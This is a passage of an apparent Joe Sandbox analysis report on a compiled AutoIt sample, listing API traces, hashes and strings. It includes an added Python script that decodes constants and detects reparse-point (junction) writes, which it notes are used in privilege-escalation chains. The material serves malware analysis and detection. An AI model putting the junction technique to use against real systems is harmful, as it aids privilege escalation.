                                                    • Instruction ID: c9978d945a96a83fa7ab32c5f0113b691718156d857cef52d90d2c149d3a0e62
                                                    • Opcode Fuzzy Hash: 6d627f2d9db22c4485a6f36d4c1b27ff00cee21bb147430c5b5337d3fb6e6bbf
                                                    • Instruction Fuzzy Hash: 42516BB55043049FC744EF24C8818ABB7F6EF94718F04496CF886972A2DB31AE06CF52
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066A47A
                                                    • __swprintf.LIBCMT ref: 0066A49C
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0066A4D9
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066A4FE
                                                    • _memset.LIBCMT ref: 0066A51D
                                                    • _wcsncpy.LIBCMT ref: 0066A559
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066A58E
                                                    • CloseHandle.KERNEL32(00000000), ref: 0066A599
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0066A5A2
                                                    • CloseHandle.KERNEL32(00000000), ref: 0066A5AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: 0b0faa9e0b9fd32a79912804358ff94df0168e566eca3048ca50a348103e3604
                                                    • Instruction ID: d6f46ca710d5ef9833e2a72820fbff65d31ac659c5bf324241f8aef099998231
                                                    • Opcode Fuzzy Hash: 0b0faa9e0b9fd32a79912804358ff94df0168e566eca3048ca50a348103e3604
                                                    • Instruction Fuzzy Hash: 1C319DB1500119ABDB20DBA0DC48FEB73BEEF88701F1041BAFA09E6160EB7097448F65
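The call sequence in this function is worth decoding rather than skimming: CreateDirectoryW, then CreateFileW with access 40000000 (GENERIC_WRITE), disposition 00000003 (OPEN_EXISTING) and flags 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, the combination needed to open a directory handle that refers to the reparse point itself), then DeviceIoControl with control code 000900A4, which is FSCTL_SET_REPARSE_POINT, using a "\??\%s" substitute name, and RemoveDirectoryW on the failure path. That is the standard recipe for writing a reparse point (a junction or mount point) onto a freshly created directory. Since the report classifies the sample as a compiled AutoIt script, this is most likely runtime library code rather than script logic, but the same primitive is what file-system privilege-escalation chains rely on, so it deserves a second look whenever it appears in a trace. The following Python is an added example, not code from the sandbox report or from the sample: it parses trace lines of this format, decodes the CTL_CODE and CreateFileW constants, and pairs a reparse-point-aware open with the FSCTL_SET_REPARSE_POINT that follows it. The lookup tables cover only the constants this trace needs (an assumption: they are deliberately partial), and the input is copied from the lines above.

```python
"""Decode CreateFileW / DeviceIoControl constants from a Joe Sandbox API trace
and flag the reparse-point write sequence. Added example, not report code.
Assumption: lookup tables are partial (only constants needed here)."""
import re
from typing import NamedTuple

# Constructed input: the API lines of the function above, copied verbatim.
TRACE = """\
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066A47A
• __swprintf.LIBCMT ref: 0066A49C
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0066A4D9
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066A4FE
• _memset.LIBCMT ref: 0066A51D
• _wcsncpy.LIBCMT ref: 0066A559
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066A58E
• CloseHandle.KERNEL32(00000000), ref: 0066A599
• RemoveDirectoryW.KERNEL32(?), ref: 0066A5A2
• CloseHandle.KERNEL32(00000000), ref: 0066A5AC
"""

# One trace line: "• Func.MODULE(arg,arg,...), ref: ADDR"; CRT calls carry no argument list.
LINE_RE = re.compile(
    r"•\s+(?P<func>[\w@$?]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?.*?ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

class Call(NamedTuple):
    func: str
    module: str
    args: tuple   # hex strings, or "?" where the sandbox could not resolve the value
    ref: int      # address of the call site

def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        calls.append(Call(m.group("func"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

# CTL_CODE(DeviceType, Function, Method, Access) = DeviceType<<16 | Access<<14 | Function<<2 | Method
DEVICE_TYPES = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
FSCTL_NAMES = {(0x9, 41): "FSCTL_SET_REPARSE_POINT", (0x9, 42): "FSCTL_GET_REPARSE_POINT",
               (0x9, 43): "FSCTL_DELETE_REPARSE_POINT"}

def decode_ctl_code(code):
    device, function, method = (code >> 16) & 0xFFFF, (code >> 2) & 0xFFF, code & 0x3
    return {"device": DEVICE_TYPES.get(device, hex(device)), "function": function,
            "method": METHODS[method], "access": ACCESS[(code >> 14) & 0x3],
            "name": FSCTL_NAMES.get((device, function), "unknown")}

ACCESS_MASK = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CREATEFILE_FLAGS = {0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}

def decode_flags(value, table):
    """Name each set bit found in table; report any unknown remainder as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value
    for bit in table:
        leftover &= ~bit
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"

def describe_create_file(call):
    """CreateFileW(name, access, share, sa, disposition, flagsAndAttributes, template)."""
    a = call.args + ("?",) * 7          # pad so short/unknown argument lists decode as "?"
    dec = lambda arg, table: "?" if arg == "?" else decode_flags(int(arg, 16), table)
    return {"access": dec(a[1], ACCESS_MASK), "share": dec(a[2], SHARE_MODE),
            "disposition": "?" if a[4] == "?" else DISPOSITION.get(int(a[4], 16), a[4]),
            "flags": dec(a[5], CREATEFILE_FLAGS)}

def find_reparse_point_writes(calls):
    """Pair a CreateFileW that opens the reparse point itself (FILE_FLAG_OPEN_REPARSE_POINT)
    with the next DeviceIoControl(FSCTL_SET_REPARSE_POINT) in trace order."""
    hits, pending = [], None
    for c in calls:
        if c.func == "CreateFileW" and len(c.args) > 5 and c.args[5] != "?":
            if int(c.args[5], 16) & 0x00200000:
                pending = c
        elif c.func == "DeviceIoControl" and pending is not None and len(c.args) > 1 and c.args[1] != "?":
            if decode_ctl_code(int(c.args[1], 16))["name"] == "FSCTL_SET_REPARSE_POINT":
                hits.append((pending, c))
                pending = None
    return hits

if __name__ == "__main__":
    calls = parse_trace(TRACE)
    for opened, ioctl in find_reparse_point_writes(calls):
        print(f"{opened.ref:08X} CreateFileW {describe_create_file(opened)}")
        print(f"{ioctl.ref:08X} DeviceIoControl {decode_ctl_code(int(ioctl.args[1], 16))}")
```

Run on the trace above it reports the open at 0066A4FE as GENERIC_WRITE / OPEN_EXISTING / FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_BACKUP_SEMANTICS and the IOCTL at 0066A58E as FSCTL_SET_REPARSE_POINT (device FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED). The reparse tag itself is not visible in the trace, so whether the data buffer describes a mount point or something else has to be read from the REPARSE_DATA_BUFFER in a memory dump; the "\??\%s" string and the directory-first ordering are what make the junction interpretation the likely one.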
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                    • String ID:
                                                    • API String ID: 884005220-0
                                                    • Opcode ID: 6935831e4cb53f4ff3c599d78d56f0fff0341d3ff7c238a48877b23bd6b38bf0
                                                    • Instruction ID: fc730e267b037fa97997833a93b231cdb371e803af5acc1ff410f722ce737d8c
                                                    • Opcode Fuzzy Hash: 6935831e4cb53f4ff3c599d78d56f0fff0341d3ff7c238a48877b23bd6b38bf0
                                                    • Instruction Fuzzy Hash: 0E612672900611AFDB209FA4EC41BB9B7A7EF11321F144219E8829B3D1DF39D841DBD6
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0066DC7B
                                                    • _wcscat.LIBCMT ref: 0066DC93
                                                    • _wcscat.LIBCMT ref: 0066DCA5
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0066DCBA
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066DCCE
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0066DCE6
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0066DD00
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066DD12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: a44366e83ab40e08bb3084000670bb1b3288fbdf78521886582577bd4b2c6ef3
                                                    • Instruction ID: 7aabbf3d2d232f7e1e9c6f3b1c564dcd6a5b28b0e2c759df0c2ed78c79c88df6
                                                    • Opcode Fuzzy Hash: a44366e83ab40e08bb3084000670bb1b3288fbdf78521886582577bd4b2c6ef3
                                                    • Instruction Fuzzy Hash: EB81A3B1A042459FCB64EF24C8559AEB7EABF88350F19882EF885CB351E630DD45CB52
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068C4EC
                                                    • GetFocus.USER32 ref: 0068C4FC
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0068C507
                                                    • _memset.LIBCMT ref: 0068C632
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0068C65D
                                                    • GetMenuItemCount.USER32(?), ref: 0068C67D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0068C690
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0068C6C4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0068C70C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068C744
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068C779
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: e12ff08f6cf2f616a6db54b55232cc39fc24e594a37725d817c719af05d88319
                                                    • Instruction ID: d574727d6eccf06ba77c5a1824a86bb534a89ff516c64d15162ebe1a12229806
                                                    • Opcode Fuzzy Hash: e12ff08f6cf2f616a6db54b55232cc39fc24e594a37725d817c719af05d88319
                                                    • Instruction Fuzzy Hash: 8A817E70208315AFDB10EF14C984AABBBE6FF88324F104A2DF99597291D770D945CFA6
                                                    APIs
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658766
                                                      • Part of subcall function 0065874A: GetLastError.KERNEL32(?,0065822A,?,?,?), ref: 00658770
                                                      • Part of subcall function 0065874A: GetProcessHeap.KERNEL32(00000008,?,?,0065822A,?,?,?), ref: 0065877F
                                                      • Part of subcall function 0065874A: HeapAlloc.KERNEL32(00000000,?,0065822A,?,?,?), ref: 00658786
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0065879D
                                                      • Part of subcall function 006587E7: GetProcessHeap.KERNEL32(00000008,00658240,00000000,00000000,?,00658240,?), ref: 006587F3
                                                      • Part of subcall function 006587E7: HeapAlloc.KERNEL32(00000000,?,00658240,?), ref: 006587FA
                                                      • Part of subcall function 006587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00658240,?), ref: 0065880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00658458
                                                    • _memset.LIBCMT ref: 0065846D
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065848C
                                                    • GetLengthSid.ADVAPI32(?), ref: 0065849D
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 006584DA
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006584F6
                                                    • GetLengthSid.ADVAPI32(?), ref: 00658513
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00658522
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00658529
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065854A
                                                    • CopySid.ADVAPI32(00000000), ref: 00658551
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00658582
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006585A8
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006585BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 6f57cddb8b2e595f25deb7cb205ad86b51b9f4c7c52898e5e2df035c3f68d31b
                                                    • Instruction ID: 96a4a5a96544f05d9affe295cb2ca4671998d76f578930cb5c7ac8d8c1e70b92
                                                    • Opcode Fuzzy Hash: 6f57cddb8b2e595f25deb7cb205ad86b51b9f4c7c52898e5e2df035c3f68d31b
                                                    • Instruction Fuzzy Hash: 9A611971900209AFDF109FA4DC45AEEBBBAFF04305F148269F915B7691EB319A19CF60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 006776A2
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006776AE
                                                    • CreateCompatibleDC.GDI32(?), ref: 006776BA
                                                    • SelectObject.GDI32(00000000,?), ref: 006776C7
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0067771B
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00677757
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0067777B
                                                    • SelectObject.GDI32(00000006,?), ref: 00677783
                                                    • DeleteObject.GDI32(?), ref: 0067778C
                                                    • DeleteDC.GDI32(00000006), ref: 00677793
                                                    • ReleaseDC.USER32(00000000,?), ref: 0067779E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: cc8319f89098f26979fc8294391bc8b1eb1fe1cbbd8829ce16848ecff46192a8
                                                    • Instruction ID: ed873079187068e522c3764d5b3c1a32eb25725fbe55bcc7ba5302581cfab884
                                                    • Opcode Fuzzy Hash: cc8319f89098f26979fc8294391bc8b1eb1fe1cbbd8829ce16848ecff46192a8
                                                    • Instruction Fuzzy Hash: A5513975904209EFCB15CFA8CC85EAEBBBAEF48710F14852DF94997350D771A941CB60
                                                    APIs
                                                      • Part of subcall function 00620B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00606C6C,?,00008000), ref: 00620BB7
                                                      • Part of subcall function 006048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006048A1,?,?,006037C0,?), ref: 006048CE
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606D0D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00606E5A
                                                      • Part of subcall function 006059CD: _wcscpy.LIBCMT ref: 00605A05
                                                      • Part of subcall function 0062387D: _iswctype.LIBCMT ref: 00623885
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-1018226102
                                                    • Opcode ID: 8166da723e12cd56240cd8f11d3af580549ce9e925f78a7de5119561dfb03acb
                                                    • Instruction ID: 5ee78e9b944dcd657f606d772dcdb9e76edae6cea34f1ed3952c6805472a603b
                                                    • Opcode Fuzzy Hash: 8166da723e12cd56240cd8f11d3af580549ce9e925f78a7de5119561dfb03acb
                                                    • Instruction Fuzzy Hash: 63029C705483419FC768EF24C881AAFBBE6AF98314F04492DF486972E1DB31E949CF56
                                                    APIs
                                                    • _memset.LIBCMT ref: 006045F9
                                                    • GetMenuItemCount.USER32(006C6890), ref: 0063D7CD
                                                    • GetMenuItemCount.USER32(006C6890), ref: 0063D87D
                                                    • GetCursorPos.USER32(?), ref: 0063D8C1
                                                    • SetForegroundWindow.USER32(00000000), ref: 0063D8CA
                                                    • TrackPopupMenuEx.USER32(006C6890,00000000,?,00000000,00000000,00000000), ref: 0063D8DD
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0063D8E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 2751501086-0
                                                    • Opcode ID: f6f0664abad348f2f0612b7cd03ecd442142392a4d68276a1e7a02c56e7d5582
                                                    • Instruction ID: bda5534bcfe41093f1eb9fd1cd9973911fa34b6837ae8f5c412df494f25ff365
                                                    • Opcode Fuzzy Hash: f6f0664abad348f2f0612b7cd03ecd442142392a4d68276a1e7a02c56e7d5582
                                                    • Instruction Fuzzy Hash: 9771E370640205BBEB359F24EC45FEABF66FF05368F204216F615A62E0CBB16C10DB95
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00678BEC
                                                    • CoInitialize.OLE32(00000000), ref: 00678C19
                                                    • CoUninitialize.OLE32 ref: 00678C23
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00678D23
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00678E50
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00692C0C), ref: 00678E84
                                                    • CoGetObject.OLE32(?,00000000,00692C0C,?), ref: 00678EA7
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00678EBA
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00678F3A
                                                    • VariantClear.OLEAUT32(?), ref: 00678F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID: ,,i
                                                    • API String ID: 2395222682-3276395716
                                                    • Opcode ID: 0ece90c1a620242ea9aa95791647fc03226a087f9d9c8d64f0de38250eb78a15
                                                    • Instruction ID: 6493e89f4c42199c928a54beefaa2c5a67e761d44d8cefdf4eeb52ee97cb0e85
                                                    • Opcode Fuzzy Hash: 0ece90c1a620242ea9aa95791647fc03226a087f9d9c8d64f0de38250eb78a15
                                                    • Instruction Fuzzy Hash: 90C113B1648305AFD700DF64C88896BB7EAFF88348F10896DF5899B251DB71ED06CB52
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: ed0208c514e07237399a8517893692b63cd58355a42b40f95df68e43d4ae9a22
                                                    • Instruction ID: a01c3c8443dda2616ad4c3dcd008cfb8289cdafd17a36f5bbc474182d1f2cd6d
                                                    • Opcode Fuzzy Hash: ed0208c514e07237399a8517893692b63cd58355a42b40f95df68e43d4ae9a22
                                                    • Instruction Fuzzy Hash: E341917014125A8FDF14FF94ECA1AEB372BAF16300F004558FC915B692DB70AA9BCB60
                                                    APIs
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                      • Part of subcall function 00607A84: _memmove.LIBCMT ref: 00607B0D
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006655D2
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006655E8
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006655F9
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0066560B
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0066561C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
